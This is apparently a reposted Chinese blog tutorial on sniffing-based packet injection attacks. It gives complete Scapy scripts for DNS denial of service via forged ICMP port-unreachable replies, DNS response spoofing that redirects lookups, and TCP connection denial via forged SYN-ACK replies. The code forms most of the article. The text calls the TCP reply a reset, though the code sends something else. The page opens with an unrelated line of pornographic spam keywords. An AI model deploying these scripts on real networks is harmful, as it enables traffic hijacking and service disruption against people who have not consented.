成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费

資訊專欄INFORMATION COLUMN

網(wǎng)絡(luò)安全 - 旁路監(jiān)聽攻擊技術(shù)

CoderBear / 1443人閱讀

摘要:部分來自網(wǎng)絡(luò),適用于學(xué)習(xí),維護(hù)網(wǎng)絡(luò)安全,做合法公民一和不同,沒有面向連接的機(jī)制,其是一種不可靠的協(xié)議,沒有確認(rèn)機(jī)制。

部分來自網(wǎng)絡(luò),適用于學(xué)習(xí),維護(hù)網(wǎng)絡(luò)安全,做合法公民

一、UDP

和TCP不同,UDP沒有面向連接的機(jī)制,其是一種不可靠的協(xié)議,沒有確認(rèn)機(jī)制。也就是說只要其端口開放,有數(shù)據(jù)需要交互時直接進(jìn)行數(shù)據(jù)交互,也不需要TCP的三次握手。這樣的話,基于UDP的攻擊比基于TCP的攻擊需要分析的條件相對少了一些。

下面是Python實現(xiàn)過程:

1、配置環(huán)境

本人使用的是Win7 64位系統(tǒng),Python2.7.9,Scapy2.3.3(Python版本必須>=2.7.9,因為Scapy其它版本缺少模塊)。

安裝Python后,下載 setuptools-36.2.0 ,解壓到任意目錄下,運(yùn)行:

運(yùn)行成功后,會生成Script目錄,里面就是下載Python模塊的工具了:

接下來我們安裝Scapy2.3.3:

以上我們就將環(huán)境配置好了。

2、安裝抓包工具 Wireshark

Wireshark使用起來很簡單,這里不做過多介紹。抓包工具有很多,下面介紹幾款流行抓包工具:Wireshark、Fiddler(可抓取網(wǎng)站或手機(jī)數(shù)據(jù)包,可支持Https)、Burpsuite、tcpdump(Linux自帶工具)、airodump-ng(Wifi滲透,可顯示路由器的BSSID ESSID,以及所有連接的客戶端。但需要一款可監(jiān)聽注入的網(wǎng)卡)等等。

運(yùn)行Wireshark,點擊監(jiān)聽的網(wǎng)絡(luò):

接下來我們 ping www.baidu.com 會抓到什么包?

上圖依次為DNS域名查詢請求與響應(yīng),成功返回ip。以上就是一次DNS域名解析的過程。

查詢網(wǎng)卡詳細(xì)信息:

3、實施攻擊

3.1、UDP DOS

因為UDP是無連接的,同一個連接中的報文與前面或后面的報文都沒有直接關(guān)系。因此對其DOS攻擊不像TCP那樣只需要發(fā)送一個reset包就可以干掉一個TCP連接那樣簡單,針對UDP的DOS需要將每個報文都DOS掉,不然應(yīng)用層的重傳機(jī)制還是會重傳相應(yīng)數(shù)據(jù)以保持會話與交互的數(shù)據(jù)完整。因此針對UDP的DOS攻擊一般情況下都是針對UDP的輕量化應(yīng)用進(jìn)行攻擊,如DNS這種小量交互的報文,而不是P2P這種大量報文交互的應(yīng)用。

因此對其進(jìn)行DOS非常簡單,只需要監(jiān)聽網(wǎng)絡(luò)中的DNS流量,有DNS查詢時,直接返回一個ICMP Port unreachable報文即可,表示端口沒有開放。若為TCP的應(yīng)用,其端口沒有開放時,一般回應(yīng)一個reset報文。并且有一點一定要保證,就是ICMP port unreachable報文一定要比正常的DNS 響應(yīng)報文早到客戶端,這樣才可以達(dá)到DOS的效果。

部分代碼做了注釋:

#!/usr/bin/python
# -*- coding: utf-8 -*-

import random
from scapy.all import *
from scapy.arch.windows import compatibility

# 防止scapy2.3.3版本中出現(xiàn)log_runtime錯誤
compatibility.log_runtime = log_runtime
compatibility.MTU = MTU
compatibility.PcapTimeoutElapsed = PcapTimeoutElapsed
compatibility.ETH_P_ALL = ETH_P_ALL
compatibility.plist = plist
compatibility.sniff(1)

conf.iface = "Intel(R) Ethernet Connection I217-LM" # 綁定網(wǎng)卡,替換成之前所保存的網(wǎng)卡信息,linux需在sniff()中指定網(wǎng)卡

# DNS響應(yīng)的地址,隨機(jī)ip字段的id和ttl
ipid = random.randint(1,65535)
ipttl = random.randint(45,80)

def buying(mots):

    resp = Ether()/IP()/ICMP()/IP()/UDP()

    #構(gòu)造ICMP報文
    resp[ICMP].type = 3
    resp[ICMP].code = 3
    resp[ICMP][IP].src = mots[IP].src
    resp[ICMP][IP].dst = mots[IP].dst
    resp[ICMP][IP].ttl = ipttl
    resp[ICMP][IP].id = ipid
    resp[ICMP][UDP].sport = mots[UDP].sport
    resp[ICMP][UDP].dport = mots[UDP].dport

    #構(gòu)造IP包頭
    resp[IP].src = mots[IP].dst
    resp[IP].dst = mots[IP].src
    resp[IP].ttl = ipttl
    resp[IP].id  = ipid

    #構(gòu)造以太網(wǎng)包頭
    resp[Ether].src = mots[Ether].dst
    resp[Ether].dst = mots[Ether].src

    #發(fā)送構(gòu)造的ICMP響應(yīng)包
    sendp(resp, count = 100)

if __name__ == "__main__":
    print "start sniff"
    sniff(prn=buying, filter="udp dst port 53") # 嗅探,過濾upd目標(biāo)端口53

命令行運(yùn)行Python程序,然后再次 ping www.baidu.com,出現(xiàn)以下情況:

由于DNS使用UDP,而UDP是一種不可靠的協(xié)議,其存在丟包的可能,因此DNS為了保證應(yīng)用的可靠性,一般的DNS查詢都是發(fā)送多個,當(dāng)前面一個查詢失敗時,會繼續(xù)發(fā)送DNS查詢報文。如果第一個DNS查詢被DOS了,但是第二個DNS時卻被正常響應(yīng)了。所以導(dǎo)致DNS結(jié)果還是正常的。

3.2、UDP 欺騙

很簡單,在監(jiān)聽到客戶端發(fā)送請求時,發(fā)送一個偽造的響應(yīng),并且比正常的響應(yīng)早到,這樣即可達(dá)到欺騙的效果。實際攻擊還是攻擊輕量化的應(yīng)用,流量較大的攻擊效果不一定明顯,且成本很大。還是以DNS為測試目標(biāo)吧。DNS污染在運(yùn)營商里做的比較多,原理很簡單:利益。并且其實現(xiàn)起來具有天然優(yōu)勢,可以在關(guān)鍵鏈路和節(jié)點進(jìn)行分光監(jiān)聽并發(fā)送偽造的數(shù)據(jù)包。

#!/usr/bin/python
# -*- coding: utf-8 -*-

import random
from scapy.all import *
from scapy.arch.windows import compatibility

# 防止scapy2.3.3版本中出現(xiàn)log_runtime錯誤
compatibility.log_runtime = log_runtime
compatibility.MTU = MTU
compatibility.PcapTimeoutElapsed = PcapTimeoutElapsed
compatibility.ETH_P_ALL = ETH_P_ALL
compatibility.plist = plist
compatibility.sniff(1)

conf.iface = "Intel(R) Ethernet Connection I217-LM" # 綁定網(wǎng)卡,linux需在sniff()中指定網(wǎng)卡

# DNS響應(yīng)的地址,隨機(jī)ip字段的id和ttl
rdata = "1.2.3.4"
ipid = random.randint(1,65535)
ipttl = random.randint(45,80)

def buying(mots):

    resp = Ether()/IP()/UDP()/DNS()

    #構(gòu)造DNS相關(guān)字段
    resp[DNS].qr = 1
    resp[DNS].rd = 1
    resp[DNS].qdcount = 1
    resp[DNS].ancount = 1
    resp[DNS].id = mots[DNS].id
    resp[DNS].qd = mots[DNS].qd
    resp[DNS].an = DNSRR(type="A",rclass="IN",ttl=1800,rdata=rdata)
    resp[DNS].an.rrname = mots[DNS].qd.qname

    #構(gòu)造UDP相關(guān)字段
    resp[UDP].dport = mots[UDP].sport
    resp[UDP].sport = mots[UDP].dport

    #構(gòu)造IP包頭
    resp[IP].src = mots[IP].dst
    resp[IP].dst = mots[IP].src
    resp[IP].ttl = ipttl
    resp[IP].id  = ipid

    #構(gòu)造以太網(wǎng)包頭
    resp[Ether].src = mots[Ether].dst
    resp[Ether].dst = mots[Ether].src

    #發(fā)送構(gòu)造的DNS響應(yīng)包
    sendp(resp)
    print("DNS響應(yīng)為:",mots[DNS].qd.qname,"->",rdata)

if __name__ == "__main__":
    print "start sniff"
    sniff(prn=buying,filter="udp dst port 53")

命令行運(yùn)行Python程序,然后再次 ping www.baidu.com,出現(xiàn)以下情況:

以上就成功進(jìn)行了UDP欺騙,將百度重定向到1.2.3.4上。

二、TCP

比如探測某一端口是否開放時,一般發(fā)送SYN,若其端口開放,對方回應(yīng)SYN+ACK;若端口不開放,則回應(yīng)reset。所以針對TCP的應(yīng)用,我們進(jìn)行DOS時,可以監(jiān)聽其SYN包,一旦有客戶端發(fā)送SYN,直接給其回應(yīng)reset,并且保證偽造的reset比正常的響應(yīng)包早到,即可達(dá)到DOS的效果。

1、配置環(huán)境

與UDP配置相同

2、實施攻擊

2.1、TCP DOS

#!/usr/bin/python
# -*- coding: utf-8 -*-

import random
from scapy.all import *
from scapy.arch.windows import compatibility

# 防止scapy2.3.3版本中出現(xiàn)log_runtime錯誤
compatibility.log_runtime = log_runtime
compatibility.MTU = MTU
compatibility.PcapTimeoutElapsed = PcapTimeoutElapsed
compatibility.ETH_P_ALL = ETH_P_ALL
compatibility.plist = plist
compatibility.sniff(1)

conf.iface = "Intel(R) Ethernet Connection I217-LM" # 綁定網(wǎng)卡,linux需在sniff()中指定網(wǎng)卡

#隨機(jī)ip字段的id和ttl
ipid = random.randint(1,65535)
ipttl = random.randint(45,80)
tcpseq = random.randint(1,4294967295)

def buying(tcpmots):

    resp = Ether()/IP()/TCP()

    #構(gòu)造TCP相關(guān)字段
    resp[TCP].dport = tcpmots[TCP].sport
    resp[TCP].sport = tcpmots[TCP].dport
    resp[TCP].ack = 0 # ack大小可以任意指定
    resp[TCP].flags = "SA"
    resp[TCP].window = 0

    # 構(gòu)造IP包頭
    resp[IP].src = tcpmots[IP].dst
    resp[IP].dst = tcpmots[IP].src
    resp[IP].ttl = ipttl
    resp[IP].id  = ipid

    #構(gòu)造以太網(wǎng)包頭
    resp[Ether].src = tcpmots[Ether].dst
    resp[Ether].dst = tcpmots[Ether].src

    #發(fā)送構(gòu)造的TCP DOS 包
    sendp(resp,count=1)
    print("TCP DOS 攻擊",resp[IP].dst,"成功")

if __name__ == "__main__":
    print "start sniff"
    sniff(prn=buying,filter="tcp[tcpflags]&(tcp-syn)!=0 and tcp[tcpflags]&(tcp-ack)==0")

運(yùn)行以上代碼:

大家實驗可能失敗的因素有很多,比如對DNS進(jìn)行了加密、采用DNS延遲解析、網(wǎng)絡(luò)不穩(wěn)定都會對攻擊產(chǎn)生一定影響,不是每次攻擊都會成功,這點希望大家能注意到。

文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉(zhuǎn)載請注明本文地址:http://systransis.cn/yun/40633.html

相關(guān)文章

  • CDN詳解

    摘要:在一個節(jié)點中,設(shè)備和本地負(fù)載均衡設(shè)備的連接方式有兩種一種是旁路方式,一種是穿越方式。 文章同步于Github Pines-Cheng/blog 什么是CDN CDN(內(nèi)容分發(fā)網(wǎng)絡(luò))全稱是 Content Delivery Network,建立并覆蓋在承載網(wǎng)之上、由分布在不同區(qū)域的邊緣節(jié)點服務(wù)器群組成的分布式網(wǎng)絡(luò),替代傳統(tǒng)以 WEB Server 為中心的數(shù)據(jù)傳輸模式。 作用是將源內(nèi)容發(fā)...

    番茄西紅柿 評論0 收藏0
  • CDN詳解

    摘要:在一個節(jié)點中,設(shè)備和本地負(fù)載均衡設(shè)備的連接方式有兩種一種是旁路方式,一種是穿越方式。 文章同步于Github Pines-Cheng/blog 什么是CDN CDN(內(nèi)容分發(fā)網(wǎng)絡(luò))全稱是 Content Delivery Network,建立并覆蓋在承載網(wǎng)之上、由分布在不同區(qū)域的邊緣節(jié)點服務(wù)器群組成的分布式網(wǎng)絡(luò),替代傳統(tǒng)以 WEB Server 為中心的數(shù)據(jù)傳輸模式。 作用是將源內(nèi)容發(fā)...

    ChristmasBoy 評論0 收藏0
  • UCloud 開啟負(fù)載均衡+WAF一鍵聯(lián)動,云原生能力賦能Web防護(hù)創(chuàng)新模式

    摘要:為使用七層負(fù)載均衡的用戶,提供安全高效的應(yīng)用防護(hù)能力?;谪?fù)載均衡集群的運(yùn)維能力,可快速進(jìn)行擴(kuò)容容災(zāi)遷移的部署。伴隨著互聯(lián)網(wǎng)+時代的到來,Web系統(tǒng)作為企業(yè)IT業(yè)務(wù)的基本負(fù)載平臺,承載著各種不同種類的信息業(yè)務(wù)。但近年來針對Web應(yīng)用的攻擊事件頻發(fā),也讓W(xué)eb應(yīng)用的安全防御面臨著諸多挑戰(zhàn)。國家互聯(lián)網(wǎng)應(yīng)急中心報告就曾顯示,僅2020上半年國家信息安全漏洞共享平臺(CNVD)收錄通用型安全漏洞11...

    Tecode 評論0 收藏0

發(fā)表評論

0條評論

CoderBear

|高級講師

TA的文章

閱讀更多
最新活動
閱讀需要支付1元查看
<